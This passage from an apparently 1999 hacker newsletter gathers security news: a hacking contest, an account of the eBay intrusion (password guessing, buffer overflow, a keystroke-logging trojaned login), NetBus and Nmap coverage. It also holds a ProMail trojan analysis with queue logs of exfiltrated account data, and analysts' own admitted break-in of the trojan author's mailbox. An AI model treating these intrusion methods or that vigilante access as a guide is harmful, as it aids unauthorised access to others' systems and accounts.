  2390.          the daytime, children who will eat anything, who
  2391.          have never seen a dentist, who aren't spoiled by
  2392.          anybody, children who go to bed hungry and cry
  2393.          themselves to sleep. who live and move but have
  2394.          no being.
  2395.          We pray for children who want to be carried, and 
  2396.          for those who must be. For those who never get a
  2397.          second chance. We pray for those children who
  2398.          will grab the hand of anybody kind enough to offer
  2399.          it. For these children we pray.
  2400.                                       - unknown -
  2401.         
  2402.         
  2403.         'Hackers wanted:'
  2404.         
  2405.         http://infovlad.net/ACPM/signup.html 
  2406.         
  2407.         Only sign up if you have some skills and time to help out
  2408.         don't sign up for bragging rights, you won't be doing anyone
  2409.         any favours... - Ed
  2410.         
  2411.         
  2412.        @HWA
  2413.        
  2414.  16.0  Hacking contest, win a Netfinity server!
  2415.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2416.        Hacking Contest 
  2417.        from HNN
  2418.        contributed by ju 
  2419.  
  2420.        PC Intern, a german Computer magazine is sponsoring a
  2421.        contest to draw attention to web server security. They
  2422.        have set up a WindowsNT and a Linux system with a
  2423.        hidden file. First person to get the file wins an IBM
  2424.        Netfinity-server. Try your skillz. 
  2425.  
  2426.        PC Intern: http://www.pcintern.de/hacker.htm
  2427.        
  2428.        *   Welcome  to the Web-Hack! 
  2429.        *   We wish all participants good luck! 
  2430.  
  2431.        *   Look for "hack.txt", please!
  2432.        *   This is the wayto the Linux-Server: IP: 195.227.43.210
  2433.  
  2434.        *   This is the way to the Windows-NT-Server: IP: 195.227.43.211
  2435.        
  2436.        
  2437.        Is there optimal protection? 
  2438.  
  2439.  
  2440.        The editorial staff of the German computer magazine PC INTERN 
  2441.        wants to draw attention to security of data in web-server-systems 
  2442.        in an outstanding contest. 
  2443.        
  2444.        The hack-event aims at checking and discussing the reliability of 
  2445.        Windows-NT- and Linux-PCs' security. Starting at 9.00 am on 
  2446.        Thursday 18th, 1999, you will find two links on this site which 
  2447.        will lead to the servers to be hacked. On both servers there is 
  2448.        hidden a telephone-number and a password. The person who will 
  2449.        call first telling the password and the way he or she hacked the 
  2450.        server, wins an IBM Netfinity-server. PC INTERN grants the 
  2451.        hackers total exemption from punishment - PC INTERN's single 
  2452.        aim is to expose and discuss the security's weak spots.
  2453.        
  2454.        On IBM's stage (hall 2, D28) between 1.00 and 2.00 pm, a debate 
  2455.        will finish the web-hack-event. Dr. Harald Feldkamp, editor in 
  2456.        chief, will discuss about security in the world wide web with the 
  2457.        following participants:
  2458.        
  2459.        Dr. Werner Schmidt
  2460.        Ministerialrat beim Bundesbeauftragten fⁿr den Datenschutz
  2461.        Wilfried Seiffert
  2462.        Ministerialrat beim niedersΣchsischen Landesbeauftragten fⁿr den Datenschutz
  2463.        Frank Kertscher
  2464.        Principal IT Security fⁿr IBM Global Services
  2465.        Klaus Birkenbihl
  2466.        GMD Informationstechnik GmbH
  2467.        Tilmann Mⁿller-Gerbes
  2468.        Leiter Professional Services bei S.u.S.E.
  2469.        Felix H÷ger
  2470.        GeschΣftsfⁿhrer der NDH Netzwerkdienste H÷ger 
  2471.        
  2472.        @HWA
  2473.        
  2474.  17.0  eBay owned
  2475.        ~~~~~~~~~~
  2476.        
  2477.       http://www.ebay.com
  2478.       
  2479.       MagicFX cracks eBay 
  2480.  
  2481.       contributed by Code Kid 
  2482.       According to MagicFX eBay has been owned for quite
  2483.       some time. To prove this on March 13th he replaced the
  2484.       main web page on one of the servers for a journalist to
  2485.       confirm. The article goes into detail on just how badly
  2486.       eBay is owned. 
  2487.  
  2488.       Forbes; http://www.forbes.com/tool/html/99/mar/0319/side1.htm
  2489.       
  2490.       Going once, going twice ... HACKED! 
  2491.  
  2492.       By Adam L. Penenberg 
  2493.  
  2494.       EBay(nasdaq: EBAY), the hot one-to-one
  2495.       auction site, was hacked on Saturday March 13
  2496.       by a 22-year old college student who goes by
  2497.       the handle MagicFX. But the story doesn't end
  2498.       there. The hacker maintains access to the site and
  2499.       can return at will. He has "root" access to eBay's
  2500.       computers, the same kind the legitimate
  2501.       administrators enjoy. This means he could change
  2502.       prices or place fake ads, divert traffic to other sites
  2503.       or even take down the entire network. 
  2504.  
  2505.       This was starkly illustrated to this reporter on
  2506.       Wednesday night, when the hacker, to prove his
  2507.       point, took down eBay's home page for two minutes
  2508.       and replaced it with the message: 
  2509.  
  2510.       Proof by MagicFX that you can't always trust
  2511.       peopleà not even huge companies. (who woulda
  2512.       known that?) 
  2513.  
  2514.       "It's 9:30 PM . . . do you know who has YOUR credit
  2515.       card information?" 
  2516.  
  2517.       Although eBay customers don't use credit cards to
  2518.       pay for merchandise--the site acts as a
  2519.       middleman--sellers use them to pay the company
  2520.       service fees. When contacted, the company refused
  2521.       to comment, saying that unnamed law enforcement
  2522.       officials had requested that eBay remain silent about
  2523.       issues surrounding hacking. 
  2524.  
  2525.       Initially, the hacker, who would not divulge his real
  2526.       name, gained access to eBay's computers on
  2527.       Saturday afternoon by figuring out what accounts
  2528.       existed, then trying simple passwords. Since eBay is
  2529.       an e-commerce site, MagicFX tried words like
  2530.       "commerce," "trading" and "eBay," until he cracked
  2531.       one, although he would not divulge the password he
  2532.       used. He says he was surprised eBay's technicians
  2533.       didn't use standard password protecting schemes,
  2534.       which would have meant a mixture of numbers and
  2535.       letters. 
  2536.  
  2537.       Once inside, MagicFX employed a technique referred
  2538.       to as a "local root buffer overflow." He ran a script
  2539.       that transmits too much information into a targeted
  2540.       zone. The data that can't fit is then manipulated so
  2541.       that he was able to trick the computer into running
  2542.       his commands at an elevated privilege. 
  2543.  
  2544.       "I exploited a buffer overflow condition, which
  2545.       existed in an SUID root program," says the hacker,
  2546.       who is finishing up a B.S. in computer science. "Then
  2547.       I used software which I had written myself to get to
  2548.       the rest of the network. FreeBSD was the first
  2549.       machine I accessed, the rest were Solaris." 
  2550.  
  2551.       From there, MagicFX modified the system's software
  2552.       so that instead of providing administrators with a
  2553.       secure way to work from a remote machine, it
  2554.       logged that information to a hidden file, so that not
  2555.       only could he intercept passwords and log in names,
  2556.       but actually watch everyone's keystrokes. 
  2557.  
  2558.       "After gaining access to more of the network, I tried
  2559.       to figure out how the service worked. Most of the
  2560.       web servers run on Windows machines, which use
  2561.       the SMB protocol to load a template page off a
  2562.       specified machine and dynamically create the
  2563.       HTML." 
  2564.  
  2565.       For Saturday's hack, MagicFX left his page up for
  2566.       about 45 minutes; he claims it was viewed by about
  2567.       4,000 site visitors. (Hackers often attack on
  2568.       weekend evenings, because most system
  2569.       administrators are out of the office.) The reason
  2570.       more people didn't witness the hack is that eBay
  2571.       deploys several web servers and balances the load
  2572.       based on the amount of traffic. Since MagicFX
  2573.       exploited only one machine for the web page hack,
  2574.       only users served by that machine could view the
  2575.       hacked page. 
  2576.  
  2577.       But he claims the company must know about the
  2578.       hack, since he monitored E-mails from users alerting
  2579.       the company. He pulled his own page down and
  2580.       logged off when he spotted a system
  2581.       administrator--"to be nice." 
  2582.  
  2583.       Mirrors--or copies--of both Saturday's and
  2584.       Wednesday's hacked eBay pages have been
  2585.       archived by Brian Martin, a computer security
  2586.       consultant, on his site attrition.org
  2587.       (http://www.attrition.org/mirror/attrition/ebay.com) 
  2588.  
  2589.       What does MagicFX say about eBay's security? "I
  2590.       think they have better security than NASA, but
  2591.       that's not saying much." 
  2592.  
  2593.       Martin, who also witnessed the Wednesday night
  2594.       eBay hack, says, "Large systems like eBay are
  2595.       focused on keeping the money machine running
  2596.       smoothly, but this has come at the expense of
  2597.       security. Users should realize that just because a
  2598.       site says their personal information and credit card
  2599.       numbers are secure doesn't necessarily make it so." 
  2600.  
  2601.       MagicFX says he hacked eBay, which has a market
  2602.       cap of more than $18 billion, because he wanted to
  2603.       see how a large e-commerce site worked from the
  2604.       inside. Once there, he discovered an added bonus:
  2605.       eBay uses a proprietary system to do its trading, he
  2606.       says, and the source code is highly prized in the
  2607.       hacker world. As a result, a number of hackers have
  2608.       approached him for a copy, but he has not
  2609.       complied,, since he hasn't had a chance to sift
  2610.       through it yet. 
  2611.  
  2612.       This was not the first hack for MagicFX. Recently he
  2613.       also defaced web sites promoting the movies Varsity
  2614.       Blues and 200 Cigarettes, "because they got a lot of
  2615.       hits and I didn't like the movies really." He also hit
  2616.       monicalewinsky.com because it is "anti-Clinton" and
  2617.       "ourfirsttime," a site that claimed it would webcast a
  2618.       man and woman losing their virginity. MagicFX says
  2619.       he hacked the site to get the word out it was a
  2620.       media hoax. 
  2621.  
  2622.       "I have learned at least as much by hacking as I
  2623.       have in school," he says. 
  2624.  
  2625.       External link: 
  2626.       attrition.org 
  2627.       
  2628.       
  2629.       @HWA
  2630.       
  2631.  18.0  Aussies to ban Net pr0n
  2632.        ~~~~~~~~~~~~~~~~~~~~~~~~
  2633.        
  2634.        From The Australian
  2635.        http://technology.news.com.au/techno/4317712.htm
  2636.        
  2637.        Alston's regime to ban Net nasties
  2638.        By WAYNE ADAMS and DAN TEBBUTT
  2639.  
  2640.        20mar99
  2641.      
  2642.        COMMUNICATIONS and Information Technology Minister Richard Alston
  2643.        has unveiled a regime that will effectively ban X-rated and Refused
  2644.        Classification material from the Internet. 
  2645.      
  2646.        "There's no doubt the Internet provides enormous educational and
  2647.        informational opportunities but, at the same time, it does pose
  2648.        considerable risks for the community," he said yesterday. 
  2649.      
  2650.        "We are therefore proposing to introduce a new regime that will
  2651.        hopefully ensure, certainly for Internet sites hosted within Australia,
  2652.        that we block access to material that is either illegal, Refused
  2653.        Classification or X-rated and, in relation to R-rated material, is only
  2654.        available to those over 18 years of age." 
  2655.      
  2656.        The Australian Broadcasting Authority will oversee the regime. 
  2657.      
  2658.        Community and Internet industry groups will be included under the
  2659.        proposals. They will provide a "hotline" on offensive material and pass
  2660.        information to the ABA, monitor online sites, advise on complaints
  2661.        mechanisms and provide community education. 
  2662.      
  2663.        If the ABA thinks content is serious enough, it will be able to prevent
  2664.        access to the material pending a National Classification Board opinion. 
  2665.      
  2666.        The authority will have to issue a notice to a service provider to halt
  2667.        access to any content deemed to be proscribed content. 
  2668.      
  2669.        Senator Alston rejected suggestions that the announcement was
  2670.        related to the Telstra sale or appeasing Independent senator and
  2671.        morals campaigner Brian Harradine. 
  2672.      
  2673.        "Senator Harradine is probably the most visible public manifestation of
  2674.        concern, but the fact is that there are many hundreds of thousands of
  2675.        people in Australia who would have the greatest concern if they
  2676.        thought that under-age children could have access to illegal or highly
  2677.        offensive material," he said. 
  2678.      
  2679.        However, Labor's communications spokesman, Stephen Smith, said
  2680.        Senator Harradine and parents "should not be duped". 
  2681.      
  2682.        "The announcement today is about Australian content, and it's a very
  2683.        small proportion of Internet content which is locally produced and
  2684.        locally put online," he said. 
  2685.      
  2686.        Kimberley Heitman, chairman of Internet advocacy group Electronic
  2687.        Frontiers Australia, said: "This is as bad as it gets û they have ignored
  2688.        everything the Internet industry has said. None of these things will
  2689.        affect end users. It will just drive content offshore." 
  2690.    
  2691.            
  2692.        @HWA
  2693.  
  2694.  
  2695.  19.0  More on the Promail email trojan
  2696.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2697.        
  2698.        Originally reported in the last issue, here's more info from packetstorm on 
  2699.        the Promail email trojan program.      
  2700.        
  2701.        Date: Fri, 19 Mar 1999 09:41:18 +0100
  2702.        From: Aeon Labs <aeon@army.net>
  2703.        To: packetstorm@genocide2600.com
  2704.        Subject: security/privacy news
  2705.        
  2706.        (Perhaps this might be of interest to Your readers.)
  2707.        
  2708.        ProMail v1.21, an advanced freeware mail program spread through several
  2709.        worldwide distribution networks (SimTel.net, Shareware.com and others),
  2710.        is a trojan.
  2711.        Upon discovering - through LAN sniffing - that the program would attempt
  2712.        to connect to SMTP instead of POP3 when a regular mail check was performed, 
  2713.        we reverse-engineered the software.
  2714.        ALL of the personal user data, including the user's password in encrypted
  2715.        format, is sent to an account on NetAddress - a free email provider -
  2716.        as soon as a valid internet connection is detected.
  2717.        Apart from this "feature", the software is 100 % functional and very
  2718.        well done.
  2719.        Well, it seems that 1999 is the worst year for privacy...
  2720.        
  2721.        More detailed information can be found on our web site at
  2722.        http://cool.icestorm.net/aeon/news.html
  2723.        
  2724.        
  2725.          ---------------------------------------------------------------------
  2726.          Aeon Labs
  2727.          http://cool.icestorm.net/aeon
  2728.        
  2729.        [http://cool.icestorm.net/aeon/news.html]
  2730.        
  2731.        03.99]
  2732.        
  2733.        ProMail v1.21, an advanced freeware mail program for Windows 95/98, is a trojan.
  2734.        It has been spread through several worldwide distribution networks (SimTel.net, 
  2735.        Shareware.com and others) as proml121.zip.
  2736.        
  2737.        Upon discovering - through LAN sniffing - that the program would attempt to 
  2738.        connect to SMTP instead of POP3 when a regular mail check was performed, we 
  2739.        reverse-engineered the software.
  2740.        
  2741.        The executable, which appears to have been created with Borland Delphi, has been 
  2742.        packed with Petite (a shareware Win32-EXE compressor) and then "hexed" to make 
  2743.        disassembly harder.
  2744.        
  2745.        ProMail v1.21 supports multiple mailboxes; every time a new mailbox is created, 
  2746.        an "ini" file containing the users full name, passwords, email addresses, 
  2747.        servers and more is generated.
  2748.        
  2749.        Prior to doing any other action, the program performs a check for a valid 
  2750.        network connection which, if found, allows for the sending of ALL of the
  2751.        personal user data, including the user's password in encrypted format, to an 
  2752.        account on NetAddress - a free email provider.
  2753.        
  2754.        Apart from this "feature", the software is 100 % functional and very well done.
  2755.        
  2756.        For further information or a more detailed analysis contact us. <aeon@army.net>
  2757.        
  2758.        ---------------------------------------------------------------------------------
  2759.        
  2760.        Date: Sat, 20 Mar 1999 03:51:00 -0500 (EST)
  2761.        From: aeon@army.net
  2762.        To: packetstorm@genocide2600.com
  2763.        Subject: Re: your mail
  2764.        
  2765.        currently our members have disassembled and analyzed the whole executable.
  2766.        the only thing it appears to do as a trojan is to send the accounts data
  2767.        entered by the user: full name, organization, email address, user name,
  2768.        password (encrypted), smtp and pop3 servers, etc.
  2769.        and since promail supports multiple accounts, each newly created account
  2770.        is sent.
  2771.        the data for each account is contained in a text file which is used to
  2772.        initialize promail at run-time.  the same text file is used as body of
  2773.        the email which is sent to the author (supposedly) of the program.
  2774.        it appears that all emails are sent with same subject line: "kirio".
  2775.        
  2776.        the program also creates the file promail.pml in its directory.  it's a
  2777.        zero length file used as permanent flag to "remember" to the trojan that
  2778.        one or more accounts data could not be sent in the last session (for
  2779.        example, when accounts are created off-line, or when not followed by a
  2780.        mail check in the same session).
  2781.        
  2782.        we also managed to crack the mailbox to which accounts data is sent.
  2783.        about ~80 emails (== accounts) were found and another dozen was
  2784.        received after only ten minutes or so.
  2785.        accounts for microsoft, michigan us army, old bridge chemicals and a
  2786.        videogames company - amongst the others - were found.
  2787.        
  2788.        we have merely informed a _contact_ (not the ml) in ntbugtraq and
  2789.        several "underground" news/security sites.
  2790.        well you can contact the various *traq mailing lists if you want.  we
  2791.        don't care if people still trust anything that can be downloaded from
  2792.        the net anyway.  i guess we're not exactly "white hat" hackers :P
  2793.        
  2794.        if you need any help or further analysis on a specific part of the program
  2795.        please feel free to contact us.
  2796.        
  2797.        
  2798.          ------------------------------------------------------------------------
  2799.          Aeon Labs <aeon@army.net>
  2800.          http://cool.icestorm.net/aeon
  2801.        
  2802.        ---------------------------------------------------------------------------------
  2803.        
  2804.        Date: Sun, 21 Mar 1999 09:40:26 +0100
  2805.        From: Patrick Oonk <patrick@pine.nl>
  2806.        To: tattooman@ADRIC.GENOCIDE2600.COM
  2807.        Subject: [patrick@pine.nl: ProMail trojan proof]
  2808.        
  2809.        ----- Forwarded message from Patrick Oonk <patrick@pine.nl> -----
  2810.        
  2811.        Hi,
  2812.        
  2813.        I've tested the ProMail Trojan, it sends the info
  2814.        to naggamanteh@usa.net using the smtp server you 
  2815.        supply when creating an account.
  2816.        
  2817.        I'll Cc: abuse@usa.net and bugs@shareware.com
  2818.        
  2819.        ProMail can still be downloaded at many sites,
  2820.        just check
  2821.        http://search.shareware.com/code/engine/File?archive=sim-win95&file=email%2fproml121%2ezip&size=409141
  2822.        
  2823.        These are the queue files at my smtp server after
  2824.        I installed ProMail and created an account:
  2825.        
  2826.        $ more /var/spool/mqueue/qfPAA17183
  2827.        V2
  2828.        T921939650
  2829.        K921939657
  2830.        N1
  2831.        P30435
  2832.        I6/0/88205
  2833.        M<naggamanteh@usa.net>... reply: read error from office.pine.nl.
  2834.        Fb
  2835.        $rSMTP
  2836.        $sfoo
  2837.        $_foo.domain.com [10.0.0.1]
  2838.        S<patrick@pine.nl>
  2839.        RPFD:<naggamanteh@usa.net>
  2840.        H?P?Return-Path: <patrick@pine.nl>
  2841.        HReceived: from foo (foo.domain.com [10.0.0.1])
  2842.                by bar.domain.com (8.9.1/8.9.1) with SMTP id PAA17183
  2843.                for <naggamanteh@usa.net>; Sat, 20 Mar 1999 15:20:50 +0100 (MET)
  2844.        H?D?Date: Sat, 20 Mar 1999 15:20:50 +0100 (MET)
  2845.        H?F?From: patrick@pine.nl
  2846.        H?M?Message-Id: <199903201420.PAA17183@bar.domain.com>
  2847.        HTo: naggamanteh@usa.net
  2848.        HSubject: kirio
  2849.        
  2850.        $ more /var/spool/mqueue/dfPAA17183
  2851.        Name=New Account
  2852.        
  2853.        [From]
  2854.        EMail=patrick@pine.nl
  2855.        Name=Patrick Oonk
  2856.        Organization=Pine Internet B.V.
  2857.        
  2858.        [ReplyTo]
  2859.        EMail=patrick@pine.nl
  2860.        Name=Patrick Oonk
  2861.        
  2862.        [POP3]
  2863.        Server=pop.domain.com
  2864.        Port=110
  2865.        User=patrick
  2866.        Password=1hFATUIxWOkJ3b3N3chBXZrFmZMUE
  2867.        PromptPassword=0
  2868.        DoPOP=1
  2869.        StandardDownload=0
  2870.        
  2871.        [SMTP]
  2872.        Server=smtp.domain.com
  2873.        Port=25
  2874.        DoSMTP=1
  2875.        
  2876.        [Filter]
  2877.        Keep=
  2878.        Delete=
  2879.        -- 
  2880.        : Patrick Oonk -    http://patrick.mypage.org/  - patrick@pine.nl :
  2881.        : Pine Internet B.V.           Consultancy, installatie en beheer :
  2882.        : Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ :
  2883.        : -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- :
  2884.        : "unix is voor types zonder sociaal leven..." - Patrick van Eijk :
  2885.        
  2886.        
  2887.        ----- End forwarded message -----
  2888.        
  2889.        -- 
  2890.        : Patrick Oonk -    http://patrick.mypage.org/  - patrick@pine.nl :
  2891.        : Pine Internet B.V.           Consultancy, installatie en beheer :
  2892.        : Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ :
  2893.        : -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- :
  2894.        : "unix is voor types zonder sociaal leven..." - Patrick van Eijk :
  2895.        : A signature starts with "-- <enter>".                           :
  2896.        
  2897.        ---------------------------------------------------------------------------------
  2898.        
  2899.        Date: Mon, 22 Mar 1999 18:20:50 +0900 (JST)
  2900.        From: Aeon Labs <aeon@army.net>
  2901.        To: packetstorm@genocide2600.com
  2902.        Subject: ProMAIL users
  2903.        
  2904.        So far we have collected hundreds of email *addresses*
  2905.        from naggamanteh@usa.net (only the headers were
  2906.        retrieved, we don't want their passwords/personal data/etc).
  2907.        With these addresses, users of ProMail could be warned
  2908.        about the problem with their passwords.
  2909.        If you can find people who are willing to do the work,
  2910.        we'll send you a list of the addresses we have collected.
  2911.        
  2912.          -----------------------------------------------------------------------------
  2913.          Aeon Labs <aeon@army.net>
  2914.          http://cool.icestorm.net/aeon
  2915.  
  2916.  
  2917.  20.0  C41 - PentagonÆs cyberdefenses criticized
  2918.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  2919.        
  2920.        PentagonÆs cyberdefenses criticized
  2921.        Report: Threats arenÆt taken seriously enough by HQ, troops
  2922.        MSNBC STAFF AND WIRE REPORTS
  2923.  
  2924.        WASHINGTON, March 22 The militaryÆs key communications infrastructure
  2925.        is dangerously vulnerable to attacks from cyberspace and  requires 
  2926.        urgent changes, according to a new  study ordered by Congress and 
  2927.        sponsored by the  Pentagon. One avenue the Pentagon was advised 
  2928.        to consider was a change in policy that would  allow it to counter
  2929.        -attack when a cyberattacker strikes.
  2930.  
  2931.  
  2932.        THE COMMAND, Control, Communications, Computers and Intelligence
  2933.        systems - known as C4I - is compromised by security problems and also by
  2934.        a military culture prone to treating such problems as a lesser priority, 
  2935.        a National Research Council committee reported."The rate at which 
  2936.        information systems are being relied on outstrips the rate at which they
  2937.        are being protected," it said. "The time needed to develop and deploy 
  2938.        effective defenses in cyberspace is much longer than the time required 
  2939.        to develop and mount an attack."
  2940.        
  2941.          It also suggested the Pentagon consider whether "counter-attack is 
  2942.        an appropriate response to a cyber attack." As U.S. policy now stands,
  2943.        the Pentagon may not go after cyber attackers, instead handing off
  2944.        investigations to civilian law enforcement agencies.
  2945.        
  2946.          Despite evidence of security lapses in C4I - which handles 
  2947.        communications and warning tasks along the chain of command - the 
  2948.        Pentagon's  "words regarding the importance of information systems 
  2949.        security have not been matched by comparable action," the report said.
  2950.        
  2951.        
  2952.        MANAGEMENT CRITICIZED
  2953.                     
  2954.         "Troops in the field did not appear to take the protection of their C4I 
  2955.        systems nearly as seriously as they do other aspects of defense," said
  2956.        the report, which Congress ordered the Pentagon to commission in 1995.
  2957.        The council is an independent organization chartered by Congress to advise
  2958.        the government.
  2959.        
  2960.         The committee said it observed one military field exercise in  which 
  2961.        personnel in an operations center mistakenly took as a joke a cyber
  2962.        attack on their systems.
  2963.        
  2964.                     The report indicated the problems were due more to the Pentagon
  2965.        's management of the systems than to the technology itself. It cited C4I
  2966.        workers' lack of stature compared with traditional combat forces,
  2967.        compatibility problems between the services and a need for more budget
  2968.        flexibility on the matter from both the Defense Department and Congress.
  2969.        
  2970.        
  2971.        PENTAGON'S RESPONSE
  2972.        
  2973.                     In a statement, the Pentagon acknowledged that the military's
  2974.        strength "is our information technology," and that "our dependence on such
  2975.        assets, which may be subject to malicious attack, makes information
  2976.        technology our weakness as well."
  2977.                     It said that as the council's report was being prepared, the
  2978.        Defense Department had already improved protection against computer attack
  2979.        by implementing new programs, establishing a joint task force for computer
  2980.        defense and expanding training of its information technology personnel.
  2981.                     But Kenneth Allard, an analyst who has written about C4I, said
  2982.        its weaknesses are in part the fault of "Industrial Age" military
  2983.        acquisition policies - applying to computers as well as tanks, ships and
  2984.        aircraft - that give the services their own procurement duties.
  2985.                     Ships and tanks may perform different tasks, he said, but the
  2986.        Army, Navy and other services need a single-standard computer system.
  2987.                     "Twenty-first century combat is the war of the databases, in
  2988.        which information flows must go from the foxhole to the White House and back
  2989.        down again," said Allard, a former Army colonel and analyst at the Center
  2990.        for Strategic and International Studies who had not yet read the council's
  2991.        report.
  2992.        
  2993.        
  2994.        RECOMMENDATIONS
  2995.        
  2996.          The report recommended:making C4I a greater budget priority in defense 
  2997.        spending, with a flexibility that can "exploit unanticipated advances in
  2998.        C4I technology." Designating an organization responsible for providing 
  2999.        direct  defensive operational support to commanders.
  3000.               
  3001.            o  Funding a program to conduct frequent, unannounced penetration
  3002.               testing of C4I systems. 
  3003.        
  3004.            o  Ensuring that programs are operable even if one part has been
  3005.               penetrated by an adversary. 
  3006.        
  3007.            o  Emphasizing the importance of information technology in the military
  3008.               leadership. 
  3009.        
  3010.            o  Establishing an Institute for Military Information Technology,
  3011.               possibly as part of an existing body.
  3012.  
  3013.  
  3014.                          An archive audio copy of the Senate hearing is
  3015.                          available via the FedNet service at
  3016.                          www.fednet.net/h0322b.htm.
  3017.      
  3018.        MSNBCÆs Miguel Llanos and The Associated Press contributed to this report.
  3019.                                  
  3020.                          
  3021.                            
  3022.              
  3023.        @HWA
  3024.        
  3025.  21.0 [ISN] NetBus 'Trojan' Splits Security Community
  3026.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3027.  
  3028.         NetBus 'Trojan' Splits Security Community
  3029.        (03/02/99, 7:46 p.m. ET)
  3030.        By Lee Kimber, Network Week
  3031.        
  3032.        
  3033.        Internet-connected networks could be left vulnerable to Trojan attacks
  3034.        because leading anti-virus software vendors have said they won't scan and
  3035.        disable a new, more powerful NetBus Trojan. 
  3036.        
  3037.        
  3038.        Remote-control programs like NetBus were dubbed Trojans because they could
  3039.        be hidden on computers by crackers. The latest version of NetBus has split
  3040.        network-security experts because its author said it was not a Trojan as it
  3041.        remained visible. 
  3042.        
  3043.        
  3044.        But crackers reportedly rewrote it to make it invisible within days of its
  3045.        launch. 
  3046.        
  3047.        
  3048.        Data Fellows and Sophos said their anti-virus products would not disable
  3049.        the recently launched remote-control Trojan NetBus 2 Pro because its
  3050.        Swedish author Carl-Fredrik Neikter was a professional who now charged $12
  3051.        for a legitimate shareware product. 
  3052.        
  3053.        
  3054.        "NetBus 2.0 Pro is not detected as it is now commercial software,"
  3055.        according to a spokesman for Data Fellows' European office in Finland.
  3056.        "NetBus 1.x up to 1.7 was detected by anti-virus scanner F-Secure but not
  3057.        NetBus 2.0" 
  3058.        
  3059.        
  3060.        Data Fellows' website reported that earlier NetBus versions were used
  3061.        frequently to steal data and delete files on people's machines. 
  3062.        
  3063.        
  3064.        NetBus lets crackers to take remote control of networked PCs, but
  3065.        publicity over its spread has been eclipsed by the Back Orifice
  3066.        remote-control Trojan written by hacker group Cult of the Dead Cow. 
  3067.        
  3068.        
  3069.        But unlike Back Orifice, NetBus can infect Windows NT machines and is more
  3070.        easily configured. And Neikter described it himself as a "remote
  3071.        administration and spy tool." 
  3072.        
  3073.        
  3074.        His promotional material also mentioned NetBus provided the ability to
  3075.        change files and registries.  Neikter could not be contacted for comment. 
  3076.        
  3077.        
  3078.        Sophos confirmed it also would not offer NetBus support. 
  3079.        
  3080.        
  3081.        "It is a commercial product and it looks extremely professionally written.
  3082.        You can use these products for lawful or unlawful purposes," said Jan
  3083.        Hruska, Sophos technical director. 
  3084.        
  3085.        
  3086.        He added Sophos products did not scan for earlier versions of NetBus but
  3087.        the company would make a scanning tool available that people could use if
  3088.        they want to. 
  3089.        
  3090.        
  3091.        But rival vendor Network Associates said it believed NetBus was aimed at
  3092.        young crackers and joined with other vendors to commit to detecting and
  3093.        removing the Trojan in Dr Solomon's and McAfee anti-virus products. 
  3094.        
  3095.        
  3096.        "We're carrying on detecting it," said the company's anti-virus consultant
  3097.        Jack Clark. 
  3098.        
  3099.        
  3100.        "We don't believe a commercial application would have a section in the
  3101.        manual that says 'have fun with your friends' and has the ability to pop
  3102.        out the CD tray on users' machines," he added. 
  3103.        
  3104.        
  3105.        And asked if Symantec would update its software to detect the Trojan,
  3106.        Symantec technical manager Kevin Street replied: "Absolutely. We've
  3107.        already got it sorted out, so why would we remove it?" 
  3108.        
  3109.        
  3110.        
  3111.        -o-
  3112.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  3113.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
  3114.        
  3115.        
  3116.        @HWA
  3117.        
  3118.  
  3119.  22.0  [ISN] Cracking tools get smarter
  3120.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3121.        
  3122.        Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
  3123.  
  3124.        
  3125.        http://www.wired.com/news/print_version/technology/story/18219.html?wnpg=all
  3126.        
  3127.        
  3128.        [Wired.com] (3.3.99) With awe and alarm, security analysts have observed
  3129.        the capabilities of Nmap, a network-scanning program that crackers are now
  3130.        using to plot increasingly cunning attacks.
  3131.        "Just before Christmas, we detected a new [network] scanning pattern we'd
  3132.        never seen before," said John Green, a security expert on the "Shadow"
  3133.        intrusion-detection team at the US Navy's Naval Surface Warfare Center.
  3134.        "Other sites have seen the same activity. The problem was, no one knew
  3135.        what was causing it." 
  3136.        Green made the remarks Tuesday in an online briefing hosted by the SANS
  3137.        Institute, a nonprofit network-security research and education
  3138.        organization. The group held the briefing to alert network administrators
  3139.        of the alarming increase in the strategies of network attacks. 
  3140.        The culprit software prowling outside the doors of networks participating
  3141.        in the study is Nmap, an existing software utility used by administrators
  3142.        to analyze networks. In the hands of intruders, security analysts
  3143.        discovered, Nmap is a potent tool for sniffing out holes and network
  3144.        services that are ripe for attack. 
  3145.        
  3146.        
  3147.        The analysts didn't look for actual damage that was carried out.  Instead,
  3148.        they silently watched as various networks were scanned by untraceable Nmap
  3149.        users. 
  3150.        
  3151.        
  3152.        "The intelligence that can be garnered using Nmap is extensive," Green
  3153.        said. "Everything that the wily hacker needs to know about your system is
  3154.        there." 
  3155.        
  3156.        
  3157.        Rather than feel in the dark to penetrate network "ports" at random, Nmap
  3158.        allows intruders to perform much more precise assaults. The implications
  3159.        are a bit unnerving for the network community. The tool makes planning
  3160.        network intrusions more effective, while simultaneously bringing this
  3161.        sophistication to a wider audience of hackers. 
  3162.        
  3163.        
  3164.        "It takes a lot of the brute force out of hacking," said Green. "It allows
  3165.        [intruders] to map hosts and target systems that might be vulnerable." 
  3166.        
  3167.        
  3168.        And that should result in a higher success rate for attempted intrusions. 
  3169.        
  3170.        
  3171.        "I think we're going to see more coordinated attacks. You can slowly map
  3172.        an entire network, while not setting off your detection system,"  said
  3173.        software developer H. D. Moore, who debriefed network analysts at the
  3174.        conference. 
  3175.        But Moore is part of the solution. He authored Nlog, software that
  3176.        automatically logs activity at a network's ports and parlays it to a
  3177.        database. Weekly checks of the database enable the user to tell if someone
  3178.        is performing an Nmap analysis. 
  3179.        
  3180.        
  3181.        Nlog serves as a companion tool to Nmap. Just like intruders,
  3182.        administrators can use Nmap to detect their own network weaknesses, then
  3183.        plug the holes. 
  3184.        
  3185.        
  3186.        Prevention is the only defense, Green and Moore said. There is no other
  3187.        known way to combat an Nmap-planned network attack. 
  3188.        
  3189.        
  3190.        "Right now it's basically a suffer-along scenario," Green said. But, at
